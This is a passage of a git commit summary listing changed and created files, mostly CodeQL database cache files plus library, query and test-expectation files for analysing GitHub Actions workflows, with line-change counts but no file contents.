db/db-yaml/default/cache/pages/4d.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/4d.pack.d | Bin 0 -> 3292 bytes db/db-yaml/default/cache/pages/4e.pack | Bin 0 -> 116 bytes db/db-yaml/default/cache/pages/4e.pack.d | Bin 0 -> 1048 bytes db/db-yaml/default/cache/pages/54.pack | Bin 0 -> 320 bytes db/db-yaml/default/cache/pages/55.pack | Bin 0 -> 91 bytes db/db-yaml/default/cache/pages/5d.pack | Bin 0 -> 221 bytes db/db-yaml/default/cache/pages/62.pack | Bin 0 -> 159 bytes db/db-yaml/default/cache/pages/6a.pack | Bin 0 -> 179 bytes db/db-yaml/default/cache/pages/6f.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/6f.pack.d | Bin 0 -> 1695 bytes db/db-yaml/default/cache/pages/7a.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/7a.pack.d | Bin 0 -> 1284 bytes db/db-yaml/default/cache/pages/7b.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/7b.pack.d | Bin 0 -> 151 bytes db/db-yaml/default/cache/pages/84.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/84.pack.d | Bin 0 -> 3788 bytes db/db-yaml/default/cache/pages/88.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/88.pack.d | Bin 0 -> 91 bytes db/db-yaml/default/cache/pages/93.pack | Bin 0 -> 113 bytes db/db-yaml/default/cache/pages/96.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/96.pack.d | Bin 0 -> 1651 bytes db/db-yaml/default/cache/pages/9e.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/9e.pack.d | Bin 0 -> 1899 bytes db/db-yaml/default/cache/pages/a1.pack | Bin 0 -> 111 bytes db/db-yaml/default/cache/pages/a3.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/a3.pack.d | Bin 0 -> 5502 bytes db/db-yaml/default/cache/pages/aa.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/aa.pack.d | Bin 0 -> 570 bytes db/db-yaml/default/cache/pages/b5.pack | Bin 0 -> 89 bytes db/db-yaml/default/cache/pages/bd.pack | Bin 0 -> 89 bytes db/db-yaml/default/cache/pages/c2.pack | Bin 0 -> 97 bytes db/db-yaml/default/cache/pages/d0.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/d0.pack.d | Bin 0 -> 5185 bytes db/db-yaml/default/cache/pages/d5.pack | Bin 0 -> 118 bytes db/db-yaml/default/cache/pages/d6.pack | Bin 0 -> 116 bytes db/db-yaml/default/cache/pages/d6.pack.d | Bin 0 -> 1767 bytes db/db-yaml/default/cache/pages/d7.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/d7.pack.d | Bin 0 -> 427 bytes db/db-yaml/default/cache/pages/df.pack | Bin 0 -> 86 bytes db/db-yaml/default/cache/pages/e1.pack | Bin 0 -> 96 bytes db/db-yaml/default/cache/pages/e9.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/e9.pack.d | Bin 0 -> 101 bytes db/db-yaml/default/cache/pages/f3.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/f3.pack.d | Bin 0 -> 3380 bytes db/db-yaml/default/cache/pages/f6.pack | Bin 0 -> 159 bytes db/db-yaml/default/cache/pages/fc.pack | Bin 0 -> 220 bytes db/db-yaml/default/cache/pages/fc.pack.d | Bin 0 -> 483 bytes db/db-yaml/default/cache/pages/fd.pack | Bin 0 -> 134 bytes db/db-yaml/default/cache/predicates/00.pack | Bin 0 -> 141 bytes db/db-yaml/default/cache/predicates/01.pack | Bin 0 -> 219 bytes db/db-yaml/default/cache/predicates/02.pack | Bin 0 -> 214 bytes db/db-yaml/default/cache/predicates/04.pack | Bin 0 -> 493 bytes db/db-yaml/default/cache/predicates/06.pack | Bin 0 -> 232 bytes db/db-yaml/default/cache/predicates/07.pack | Bin 0 -> 210 bytes db/db-yaml/default/cache/predicates/08.pack | Bin 0 -> 338 bytes db/db-yaml/default/cache/predicates/09.pack | Bin 0 -> 558 bytes db/db-yaml/default/cache/predicates/18.pack | Bin 0 -> 363 bytes db/db-yaml/default/cache/predicates/1b.pack | Bin 0 -> 169 bytes db/db-yaml/default/cache/predicates/1c.pack | Bin 0 -> 144 bytes db/db-yaml/default/cache/predicates/1f.pack | Bin 0 -> 341 bytes db/db-yaml/default/cache/predicates/22.pack | Bin 0 -> 204 bytes db/db-yaml/default/cache/predicates/24.pack | Bin 0 -> 218 bytes db/db-yaml/default/cache/predicates/25.pack | Bin 0 -> 169 bytes db/db-yaml/default/cache/predicates/26.pack | Bin 0 -> 146 bytes db/db-yaml/default/cache/predicates/27.pack | Bin 0 -> 170 bytes db/db-yaml/default/cache/predicates/28.pack | Bin 0 -> 223 bytes db/db-yaml/default/cache/predicates/29.pack | Bin 0 -> 216 bytes db/db-yaml/default/cache/predicates/2a.pack | Bin 0 -> 214 bytes db/db-yaml/default/cache/predicates/2d.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/predicates/2e.pack | Bin 0 -> 340 bytes db/db-yaml/default/cache/predicates/2f.pack | Bin 0 -> 152 bytes db/db-yaml/default/cache/predicates/32.pack | Bin 0 -> 409 bytes db/db-yaml/default/cache/predicates/3a.pack | Bin 0 -> 211 bytes db/db-yaml/default/cache/predicates/3c.pack | Bin 0 -> 413 bytes db/db-yaml/default/cache/predicates/42.pack | Bin 0 -> 546 bytes db/db-yaml/default/cache/predicates/48.pack | Bin 0 -> 343 bytes db/db-yaml/default/cache/predicates/49.pack | Bin 0 -> 220 bytes db/db-yaml/default/cache/predicates/4c.pack | Bin 0 -> 151 bytes db/db-yaml/default/cache/predicates/4e.pack | Bin 0 -> 144 bytes db/db-yaml/default/cache/predicates/55.pack | Bin 0 -> 145 bytes db/db-yaml/default/cache/predicates/57.pack | Bin 0 -> 210 bytes db/db-yaml/default/cache/predicates/58.pack | Bin 0 -> 211 bytes db/db-yaml/default/cache/predicates/59.pack | Bin 0 -> 206 bytes db/db-yaml/default/cache/predicates/5a.pack | Bin 0 -> 655 bytes db/db-yaml/default/cache/predicates/5f.pack | Bin 0 -> 212 bytes db/db-yaml/default/cache/predicates/60.pack | Bin 0 -> 151 bytes db/db-yaml/default/cache/predicates/62.pack | Bin 0 -> 419 bytes db/db-yaml/default/cache/predicates/65.pack | Bin 0 -> 357 bytes db/db-yaml/default/cache/predicates/68.pack | Bin 0 -> 210 bytes db/db-yaml/default/cache/predicates/69.pack | Bin 0 -> 213 bytes db/db-yaml/default/cache/predicates/6c.pack | Bin 0 -> 206 bytes db/db-yaml/default/cache/predicates/6f.pack | Bin 0 -> 169 bytes db/db-yaml/default/cache/predicates/72.pack | Bin 0 -> 219 bytes db/db-yaml/default/cache/predicates/73.pack | Bin 0 -> 299 bytes db/db-yaml/default/cache/predicates/74.pack | Bin 0 -> 204 bytes db/db-yaml/default/cache/predicates/75.pack | Bin 0 -> 345 bytes db/db-yaml/default/cache/predicates/77.pack | Bin 0 -> 207 bytes db/db-yaml/default/cache/predicates/7a.pack | Bin 0 -> 213 bytes db/db-yaml/default/cache/predicates/7b.pack | Bin 0 -> 207 bytes db/db-yaml/default/cache/predicates/7c.pack | Bin 0 -> 141 bytes db/db-yaml/default/cache/predicates/7d.pack | Bin 0 -> 161 bytes db/db-yaml/default/cache/predicates/7e.pack | Bin 0 -> 220 bytes db/db-yaml/default/cache/predicates/82.pack | Bin 0 -> 209 bytes db/db-yaml/default/cache/predicates/86.pack | Bin 0 -> 209 bytes db/db-yaml/default/cache/predicates/87.pack | Bin 0 -> 206 bytes db/db-yaml/default/cache/predicates/88.pack | Bin 0 -> 291 bytes db/db-yaml/default/cache/predicates/89.pack | Bin 0 -> 144 bytes db/db-yaml/default/cache/predicates/8d.pack | Bin 0 -> 231 bytes db/db-yaml/default/cache/predicates/8f.pack | Bin 0 -> 212 bytes db/db-yaml/default/cache/predicates/91.pack | Bin 0 -> 244 bytes db/db-yaml/default/cache/predicates/95.pack | Bin 0 -> 415 bytes db/db-yaml/default/cache/predicates/97.pack | Bin 0 -> 154 bytes db/db-yaml/default/cache/predicates/98.pack | Bin 0 -> 414 bytes db/db-yaml/default/cache/predicates/99.pack | Bin 0 -> 209 bytes db/db-yaml/default/cache/predicates/9c.pack | Bin 0 -> 170 bytes db/db-yaml/default/cache/predicates/9d.pack | Bin 0 -> 170 bytes db/db-yaml/default/cache/predicates/9e.pack | Bin 0 -> 220 bytes db/db-yaml/default/cache/predicates/a0.pack | Bin 0 -> 468 bytes db/db-yaml/default/cache/predicates/a2.pack | Bin 0 -> 204 bytes db/db-yaml/default/cache/predicates/a4.pack | Bin 0 -> 140 bytes db/db-yaml/default/cache/predicates/a8.pack | Bin 0 -> 213 bytes db/db-yaml/default/cache/predicates/a9.pack | Bin 0 -> 140 bytes db/db-yaml/default/cache/predicates/aa.pack | Bin 0 -> 161 bytes db/db-yaml/default/cache/predicates/ad.pack | Bin 0 -> 206 bytes db/db-yaml/default/cache/predicates/ae.pack | Bin 0 -> 154 bytes db/db-yaml/default/cache/predicates/b0.pack | Bin 0 -> 568 bytes db/db-yaml/default/cache/predicates/b2.pack | Bin 0 -> 211 bytes db/db-yaml/default/cache/predicates/b5.pack | Bin 0 -> 412 bytes db/db-yaml/default/cache/predicates/b8.pack | Bin 0 -> 161 bytes db/db-yaml/default/cache/predicates/bd.pack | Bin 0 -> 250 bytes db/db-yaml/default/cache/predicates/c1.pack | Bin 0 -> 217 bytes db/db-yaml/default/cache/predicates/c4.pack | Bin 0 -> 412 bytes db/db-yaml/default/cache/predicates/ca.pack | Bin 0 -> 254 bytes db/db-yaml/default/cache/predicates/cb.pack | Bin 0 -> 170 bytes db/db-yaml/default/cache/predicates/cc.pack | Bin 0 -> 146 bytes db/db-yaml/default/cache/predicates/cd.pack | Bin 0 -> 352 bytes db/db-yaml/default/cache/predicates/d2.pack | Bin 0 -> 363 bytes db/db-yaml/default/cache/predicates/d5.pack | Bin 0 -> 260 bytes db/db-yaml/default/cache/predicates/d8.pack | Bin 0 -> 209 bytes db/db-yaml/default/cache/predicates/dc.pack | Bin 0 -> 212 bytes db/db-yaml/default/cache/predicates/de.pack | Bin 0 -> 209 bytes db/db-yaml/default/cache/predicates/df.pack | Bin 0 -> 499 bytes db/db-yaml/default/cache/predicates/e0.pack | Bin 0 -> 151 bytes db/db-yaml/default/cache/predicates/e3.pack | Bin 0 -> 353 bytes db/db-yaml/default/cache/predicates/e4.pack | Bin 0 -> 344 bytes db/db-yaml/default/cache/predicates/e6.pack | Bin 0 -> 212 bytes db/db-yaml/default/cache/predicates/ec.pack | Bin 0 -> 213 bytes db/db-yaml/default/cache/predicates/ed.pack | Bin 0 -> 223 bytes db/db-yaml/default/cache/predicates/ee.pack | Bin 0 -> 244 bytes db/db-yaml/default/cache/predicates/f0.pack | Bin 0 -> 276 bytes db/db-yaml/default/cache/predicates/f2.pack | Bin 0 -> 411 bytes db/db-yaml/default/cache/predicates/f3.pack | Bin 0 -> 213 bytes db/db-yaml/default/cache/predicates/f6.pack | Bin 0 -> 491 bytes db/db-yaml/default/cache/predicates/f7.pack | Bin 0 -> 217 bytes db/db-yaml/default/cache/predicates/fa.pack | Bin 0 -> 207 bytes db/db-yaml/default/cache/predicates/fb.pack | Bin 0 -> 215 bytes db/db-yaml/default/cache/predicates/fc.pack | Bin 0 -> 263 bytes db/db-yaml/default/cache/predicates/ff.pack | Bin 0 -> 253 bytes db/db-yaml/default/cache/relations/07.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/0a.pack | Bin 0 -> 177 bytes db/db-yaml/default/cache/relations/0c.pack | Bin 0 -> 126 bytes db/db-yaml/default/cache/relations/0d.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/12.pack | Bin 0 -> 177 bytes db/db-yaml/default/cache/relations/13.pack | Bin 0 -> 126 bytes db/db-yaml/default/cache/relations/14.pack | Bin 0 -> 255 bytes db/db-yaml/default/cache/relations/19.pack | Bin 0 -> 126 bytes db/db-yaml/default/cache/relations/1d.pack | Bin 0 -> 126 bytes db/db-yaml/default/cache/relations/1e.pack | Bin 0 -> 126 bytes db/db-yaml/default/cache/relations/22.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/2b.pack | Bin 0 -> 160 bytes db/db-yaml/default/cache/relations/32.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/35.pack | Bin 0 -> 126 bytes db/db-yaml/default/cache/relations/52.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/5a.pack | Bin 0 -> 177 bytes db/db-yaml/default/cache/relations/60.pack | Bin 0 -> 126 bytes db/db-yaml/default/cache/relations/65.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/6e.pack | Bin 0 -> 160 bytes db/db-yaml/default/cache/relations/71.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/73.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/76.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/78.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/81.pack | Bin 0 -> 126 bytes db/db-yaml/default/cache/relations/86.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/8a.pack | Bin 0 -> 126 bytes db/db-yaml/default/cache/relations/92.pack | Bin 0 -> 126 bytes db/db-yaml/default/cache/relations/9a.pack | Bin 0 -> 272 bytes db/db-yaml/default/cache/relations/9d.pack | Bin 0 -> 340 bytes db/db-yaml/default/cache/relations/a9.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/aa.pack | Bin 0 -> 272 bytes db/db-yaml/default/cache/relations/ac.pack | Bin 0 -> 109 bytes db/db-yaml/default/cache/relations/b3.pack | Bin 0 -> 272 bytes db/db-yaml/default/cache/relations/b4.pack | Bin 0 -> 160 bytes db/db-yaml/default/cache/relations/b6.pack | Bin 0 -> 177 bytes db/db-yaml/default/cache/relations/b8.pack | Bin 0 -> 435 bytes db/db-yaml/default/cache/relations/bf.pack | Bin 0 -> 126 bytes db/db-yaml/default/cache/relations/c4.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/c7.pack | Bin 0 -> 272 bytes db/db-yaml/default/cache/relations/ca.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/cd.pack | Bin 0 -> 126 bytes db/db-yaml/default/cache/relations/d1.pack | Bin 0 -> 126 bytes db/db-yaml/default/cache/relations/d6.pack | Bin 0 -> 255 bytes db/db-yaml/default/cache/relations/dc.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/e3.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/ee.pack | Bin 0 -> 160 bytes db/db-yaml/default/cache/relations/f1.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/f7.pack | Bin 0 -> 143 bytes db/db-yaml/default/cache/relations/f9.pack | Bin 0 -> 126 bytes db/db-yaml/default/cache/relations/fd.pack | Bin 0 -> 160 bytes db/db-yaml/default/cache/version | 1 + db/db-yaml/default/containerparent.rel | Bin 0 -> 328 bytes .../default/containerparent.rel.checksum | Bin 0 -> 12 bytes db/db-yaml/default/files.rel | Bin 0 -> 208 bytes db/db-yaml/default/files.rel.checksum | Bin 0 -> 12 bytes db/db-yaml/default/folders.rel | Bin 0 -> 128 bytes db/db-yaml/default/folders.rel.checksum | Bin 0 -> 12 bytes db/db-yaml/default/locations_default.rel | Bin 0 -> 33384 bytes .../default/locations_default.rel.checksum | Bin 0 -> 12 bytes db/db-yaml/default/pools/0/buckets/info | Bin 0 -> 40 bytes .../default/pools/0/buckets/page-000000 | Bin 0 -> 8192 bytes db/db-yaml/default/pools/0/info | Bin 0 -> 33 bytes db/db-yaml/default/pools/0/metadata/info | Bin 0 -> 40 bytes .../default/pools/0/metadata/page-000000 | Bin 0 -> 16384 bytes .../default/pools/0/pageDump/page-000000000 | 55 +++ db/db-yaml/default/pools/1/buckets/info | Bin 0 -> 40 bytes .../default/pools/1/buckets/page-000000 | Bin 0 -> 8192 bytes db/db-yaml/default/pools/1/ids1/info | Bin 0 -> 40 bytes db/db-yaml/default/pools/1/ids1/page-000000 | Bin 0 -> 8192 bytes db/db-yaml/default/pools/1/indices1/info | Bin 0 -> 40 bytes .../default/pools/1/indices1/page-000000 | Bin 0 -> 8192 bytes db/db-yaml/default/pools/1/info | Bin 0 -> 41 bytes db/db-yaml/default/pools/1/metadata/info | Bin 0 -> 40 bytes .../default/pools/1/metadata/page-000000 | Bin 0 -> 8192 bytes .../default/pools/1/pageDump/page-000000000 | Bin 0 -> 1048592 bytes db/db-yaml/default/pools/poolInfo | Bin 0 -> 32 bytes db/db-yaml/default/sourceLocationPrefix.rel | Bin 0 -> 4 bytes .../default/sourceLocationPrefix.rel.checksum | Bin 0 -> 12 bytes .../default/strings/0/buckets/page-000000 | Bin 0 -> 8192 bytes .../default/strings/0/metadata/page-000000 | Bin 0 -> 16384 bytes .../default/strings/0/pageDump/page-000000000 | 2 + db/db-yaml/default/yaml.rel | Bin 0 -> 33384 bytes db/db-yaml/default/yaml.rel.checksum | Bin 0 -> 12 bytes db/db-yaml/default/yaml_locations.rel | Bin 0 -> 11128 bytes .../default/yaml_locations.rel.checksum | Bin 0 -> 12 bytes db/db-yaml/default/yaml_scalars.rel | Bin 0 -> 12540 bytes db/db-yaml/default/yaml_scalars.rel.checksum | Bin 0 -> 12 bytes db/db-yaml/yaml.dbscheme | 80 ++++ ...-diagnostics-add-20240301T120559.348Z.json | 0 ...-diagnostics-add-20240301T120600.004Z.json | 0 .../database-create-20240301.130558.279.log | 321 ++++++++++++++ ...tabase-index-files-20240301.130558.974.log | 44 ++ db/src.zip | Bin 0 -> 20479 bytes ql/lib/codeql/actions/Ast.qll | 385 +++++++++++------ .../codeql/actions/ast/internal/Actions.qll | 398 ------------------ .../actions/controlflow/internal/Cfg.qll | 26 +- .../codeql/actions/dataflow/ExternalFlow.qll | 10 +- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 4 +- .../dataflow/internal/DataFlowPrivate.qll | 4 +- .../dataflow/internal/DataFlowPublic.qll | 4 +- .../codeql-database.yml | 39 -- .../Security/CWE-020/CompositeActionsSinks.ql | 2 +- .../CWE-020/CompositeActionsSources.ql | 2 +- .../CWE-020/CompositeActionsSummaries.ql | 2 +- .../CWE-020/ReusableWorkflowsSinks.ql | 2 +- .../CWE-020/ReusableWorkflowsSources.ql | 2 +- .../CWE-020/ReusableWorkflowsSummaries.ql | 2 +- .../CWE-094/CriticalExpressionInjection.ql | 2 +- .../Security/CWE-094/ExpressionInjection.ql | 2 +- ql/src/Security/CWE-829/UnpinnedActionsTag.ql | 2 +- ql/src/Security/CWE-829/UntrustedCheckout.ql | 4 +- ql/test/library-tests/test.expected | 249 ++++++----- ql/test/library-tests/test.ql | 16 +- .../CWE-020/CompositeActionsSinks.expected | 6 +- .../CWE-020/CompositeActionsSources.expected | 12 +- .../CompositeActionsSummaries.expected | 6 +- .../CWE-020/ReusableWorkflowsSources.expected | 12 +- .../ReusableWorkflowsSummaries.expected | 12 +- .../CriticalExpressionInjection.expected | 104 ++--- .../CWE-094/ExpressionInjection.expected | 110 ++--- .../MissingActionsPermissions.expected | 2 +- .../CWE-829/UnpinnedActionsTag.expected | 14 +- .../CWE-829/UntrustedCheckout.expected | 2 +- 408 files changed, 1088 insertions(+), 865 deletions(-) create mode 100755 clean.sh create mode 100644 db/baseline-info.json create mode 100644 db/codeql-database.yml create mode 100644 db/db-yaml/default/cache/.lock create mode 100644 db/db-yaml/default/cache/cached-strings/pools/0/buckets/info create mode 100644 db/db-yaml/default/cache/cached-strings/pools/0/buckets/page-000000 create mode 100644 db/db-yaml/default/cache/cached-strings/pools/0/ids1/info create mode 100644 db/db-yaml/default/cache/cached-strings/pools/0/ids1/page-000000 create mode 100644 db/db-yaml/default/cache/cached-strings/pools/0/indices1/info create mode 100644 db/db-yaml/default/cache/cached-strings/pools/0/indices1/page-000000 create mode 100644 db/db-yaml/default/cache/cached-strings/pools/0/info create mode 100644 db/db-yaml/default/cache/cached-strings/pools/0/metadata/info create mode 100644 db/db-yaml/default/cache/cached-strings/pools/0/metadata/page-000000 create mode 100644 db/db-yaml/default/cache/cached-strings/pools/0/pageDump/page-000000000 create mode 100644 db/db-yaml/default/cache/cached-strings/pools/poolInfo create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/header create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11 create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11#0#e create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11#1#eb create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11#2#e create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11#3#eet create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TSplits-cdffdde7 create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TSplits-cdffdde7#0# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TCompletion create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TCompletion#0# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TSuccessorType create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TSuccessorType#0# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TSuccessorType#1#b create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TSuccessorType#2# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-0defa4a0 create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-0defa4a0#0#tttttt create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-0defa4a0#1#tt create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-5b92615f create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-5b92615f#0# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-5b92615f#1#ttt create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-6e089ab6 create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-6e089ab6#0# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-a2a08e4a create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-a2a08e4a#0# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-a2a08e4a#1#tt create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-b0571e78 create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-b0571e78#0# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-b0571e78#1#t create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-b18fe878 create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-b18fe878#0#t create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TAccessPathFront-12309985 create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TAccessPathFront-12309985#0# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TAccessPathFront-12309985#1#t create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TAccessPathFrontOp-ea156098 create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TAccessPathFrontOp-ea156098#0# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TAccessPathFrontOp-ea156098#1#t create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TApproxAccessPathF-0bf03857 create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TApproxAccessPathF-0bf03857#0# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TApproxAccessPathF-0bf03857#1#t create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TApproxAccessPathF-baba9c49 create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TApproxAccessPathF-baba9c49#0# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TApproxAccessPathF-baba9c49#1#t create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TBooleanOption-dec0af22 create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TBooleanOption-dec0af22#0# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TBooleanOption-dec0af22#1#b create mode 100644 